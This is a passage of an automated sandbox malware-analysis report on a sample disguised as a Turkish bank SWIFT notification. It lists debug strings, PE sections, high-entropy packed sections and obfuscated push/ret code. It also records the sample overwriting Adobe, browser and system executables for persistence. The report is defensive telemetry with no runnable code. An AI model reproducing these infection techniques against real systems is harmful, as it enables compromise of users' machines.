Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.1649365761.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.1588294725.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2038612293.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL" source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.1606714904.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.1692304917.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: elevation_service.exe, 0000000C.00000003.2464490608.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2454283724.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2452694800.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.1686861132.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1311966425.0000000001570000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.1707389126.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1699306292.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: niellist.exe, 00000003.00000003.1285740418.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000003.00000003.1287306724.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398255172.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, niellist.exe, 00000011.00000003.1398796370.0000000004F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000A.00000002.2603046672.0000000006620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 0000000C.00000003.2409444636.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000A.00000002.2517285171.0000000001462000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 0000000C.00000003.2370075769.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257737634.0000000003F40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 0000000C.00000003.2399836267.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1414567794.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: elevation_service.exe, 0000000C.00000003.2475542795.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000C.00000003.2466935099.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.1656511183.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.1614007446.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.1790463351.0000000001530000.00000004.00001000.00020000.00000000.sdmp

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: AppVClient.exe.0.dr

Static PE information: real checksum: 0xcd10f should be: 0x153130

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: officesvcmgr.exe.2.dr	Static PE information: section name: .didat
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .gxfg
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .retplne
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: CPADinfo
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: _RDATA
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: malloc_h
Source: chrmstp.exe.2.dr	Static PE information: section name: .gxfg
Source: chrmstp.exe.2.dr	Static PE information: section name: .retplne
Source: chrmstp.exe.2.dr	Static PE information: section name: .rodata
Source: chrmstp.exe.2.dr	Static PE information: section name: CPADinfo
Source: chrmstp.exe.2.dr	Static PE information: section name: LZMADEC
Source: chrmstp.exe.2.dr	Static PE information: section name: _RDATA
Source: chrmstp.exe.2.dr	Static PE information: section name: malloc_h
Source: setup.exe.2.dr	Static PE information: section name: .gxfg
Source: setup.exe.2.dr	Static PE information: section name: .retplne
Source: setup.exe.2.dr	Static PE information: section name: .rodata
Source: setup.exe.2.dr	Static PE information: section name: CPADinfo
Source: setup.exe.2.dr	Static PE information: section name: LZMADEC
Source: setup.exe.2.dr	Static PE information: section name: _RDATA
Source: setup.exe.2.dr	Static PE information: section name: malloc_h
Source: notification_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: notification_helper.exe.2.dr	Static PE information: section name: .retplne
Source: notification_helper.exe.2.dr	Static PE information: section name: CPADinfo
Source: notification_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: os_update_handler.exe.2.dr	Static PE information: section name: .gxfg
Source: os_update_handler.exe.2.dr	Static PE information: section name: .retplne
Source: os_update_handler.exe.2.dr	Static PE information: section name: CPADinfo
Source: os_update_handler.exe.2.dr	Static PE information: section name: LZMADEC
Source: os_update_handler.exe.2.dr	Static PE information: section name: _RDATA
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .gxfg
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .retplne
Source: chrome_proxy.exe.2.dr	Static PE information: section name: _RDATA
Source: crashreporter.exe.2.dr	Static PE information: section name: .00cfg
Source: crashreporter.exe.2.dr	Static PE information: section name: .voltbl
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .00cfg
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .voltbl
Source: firefox.exe.2.dr	Static PE information: section name: .00cfg
Source: firefox.exe.2.dr	Static PE information: section name: .freestd
Source: firefox.exe.2.dr	Static PE information: section name: .retplne
Source: firefox.exe.2.dr	Static PE information: section name: .voltbl
Source: updater.exe.2.dr	Static PE information: section name: CPADinfo
Source: updater.exe.2.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.2.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe0.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.2.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.2.dr	Static PE information: section name: _RDATA
Source: Acrobat.exe.2.dr	Static PE information: section name: .didat
Source: Acrobat.exe.2.dr	Static PE information: section name: _RDATA
Source: unpack200.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: setup.exe0.2.dr	Static PE information: section name: .00cfg
Source: setup.exe0.2.dr	Static PE information: section name: .gxfg
Source: setup.exe0.2.dr	Static PE information: section name: .retplne
Source: setup.exe0.2.dr	Static PE information: section name: LZMADEC
Source: setup.exe0.2.dr	Static PE information: section name: _RDATA
Source: setup.exe0.2.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.2.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.2.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: malloc_h
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .retplne
Source: notification_click_helper.exe.2.dr	Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: notification_click_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe.2.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .retplne
Source: pwahelper.exe.2.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.2.dr	Static PE information: section name: malloc_h
Source: AcroCEF.exe.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe.2.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: _RDATA
Source: AcroCEF.exe0.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe0.2.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00428945 push ecx; ret	0_2_00428958
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00402F12 push es; retf	0_2_00402F13
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB0CAh; ret	0_2_00ADB061
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB30Dh; ret	0_2_00ADB1E6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB2F2h; ret	0_2_00ADB262
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB255h; ret	0_2_00ADB2ED
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB2D0h; ret	0_2_00ADB346
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00ADB180 push 00ADB37Fh; ret	0_2_00ADB3B7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD520C push 00AD528Fh; ret	0_2_00AD522D
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF852Eh; ret	0_2_00AF7F3A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8514h; ret	0_2_00AF7F66
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7E66h; ret	0_2_00AF8057
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF817Ah; ret	0_2_00AF808B
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF82E5h; ret	0_2_00AF80D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF826Ah; ret	0_2_00AF819E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF849Ch; ret	0_2_00AF81E4
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF805Ch; ret	0_2_00AF8255
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8321h; ret	0_2_00AF82E0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7FBFh; ret	0_2_00AF831F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF7FA8h; ret	0_2_00AF834C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF84BAh; ret	0_2_00AF83E2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8426h; ret	0_2_00AF84D8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8075h; ret	0_2_00AF84FD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF808Ch; ret	0_2_00AF8512
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8B6Fh; ret	0_2_00AF8596
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8E94h; ret	0_2_00AF85C9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF878Bh; ret	0_2_00AF8734
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8D45h; ret	0_2_00AF87D3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8E5Fh; ret	0_2_00AF885F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8AB5h; ret	0_2_00AF8B13
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AF8550 push 00AF8784h; ret	0_2_00AF8CA1

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: section name: .reloc entropy: 7.931602490930911
Source: niellist.exe.0.dr	Static PE information: section name: .reloc entropy: 7.931602490930911
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.936484752465955
Source: officesvcmgr.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937208276445302
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: section name: .reloc entropy: 7.941673740769108
Source: AutoIt3_x64.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943916878766287
Source: SciTE.exe.2.dr	Static PE information: section name: .reloc entropy: 7.912294411088926
Source: jucheck.exe.2.dr	Static PE information: section name: .reloc entropy: 7.931052218150096
Source: jusched.exe.2.dr	Static PE information: section name: .reloc entropy: 7.936037837889428
Source: elevated_tracing_service.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937492437508995
Source: chrmstp.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9359021068054485
Source: setup.exe.2.dr	Static PE information: section name: .reloc entropy: 7.935901892594789
Source: notification_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9446303310280735
Source: os_update_handler.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943489828015681
Source: chrome_proxy.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940804420536394
Source: default-browser-agent.exe.2.dr	Static PE information: section name: .reloc entropy: 7.941517758258086
Source: firefox.exe.2.dr	Static PE information: section name: .reloc entropy: 7.93886858959448
Source: updater.exe.2.dr	Static PE information: section name: .reloc entropy: 7.878644949506129
Source: elevation_service.exe.2.dr	Static PE information: section name: .reloc entropy: 7.945941404050487
Source: elevation_service.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.945122234201387
Source: 7zFM.exe.2.dr	Static PE information: section name: .reloc entropy: 7.932133822129433
Source: 7zG.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9276747476160345
Source: Acrobat.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940529493632316
Source: identity_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940722839651193
Source: setup.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.944734605502099
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .reloc entropy: 7.936561935775991
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .reloc entropy: 7.94225456216923
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9462488646796805
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.944000050287652
Source: pwahelper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.940884454479864
Source: AcroCEF.exe.2.dr	Static PE information: section name: .reloc entropy: 7.937547865419181
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: .reloc entropy: 7.943696985461369
Source: AcroCEF.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.937547623122581
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.943698423708796

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
